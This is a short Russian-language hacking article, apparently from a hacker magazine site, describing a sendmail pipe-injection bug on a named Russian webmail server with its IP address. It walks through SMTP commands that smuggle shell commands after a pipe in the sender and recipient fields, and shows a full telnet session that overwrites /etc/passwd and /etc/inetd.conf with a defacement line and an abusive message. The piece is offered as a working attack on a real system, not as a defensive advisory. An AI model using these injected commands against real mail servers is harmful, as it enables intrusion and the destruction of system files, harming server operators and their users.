Сегодня я вам пишу об очень
рульном баге на www.hotmail.ru.
Проблема Unix`овой трубы довольно стара, но
актуальна и на сегодняшний день.
Баг найден на www.hotmail.ru ->
grif.newmail.ru
IP: 212.48.140.154

Sendmail установленный на grif.hotmail.ru
не ругается на трубу!))) Коннектимся на grif.newmail.ru port
25
как обычно, здороваемся -> HELO anyhost.com,  далее
пишем от кого мессага ,но не забываем ставить
трубочку
mail from : booger@nope.com|any command here.
Далее пишем кому))) Ну конечно же пишем root`у))
rcpt to : root | any command again.
ну теперь тело мессаги:
data
ПОЗДРАВЛЕНИЯ СИСТЕМНОМУ АДМИНИСТРАТОРУ.
жмем ENTER
и ставим «.»

Пример:

[root@gwx3 squid]# telnet www.hotmail.ru 25
Trying 212.48.140.154…
Connected to grif.newmail.ru.
Escape character is ‘^]’.
220 grif.newmail.ru ESMTP
HELO BOARD.NET
250 grif.newmail.ru
mail from : echo@ru|/bin/echo HACKED BY SL GROUP>/etc/passwd
250 ok
rcpt to : root|/bin/echo HACKED BY SL GROUP>/etc/inetd.conf
250 ok
data
354 go ahead
we are kill ur fucking service, kill all spamers on ur server
.
.
250 ok 964771857 qp 29268
quit
221 grif.newmail.ru
Connection closed by foreign host.

Оставить мнение

Check Also

Конкурс хаков: разведка DNS средствами chaosnet txt-записи hostname.bind

Тема information gathering с помощью DNS уже многократно поднималась в специализированных …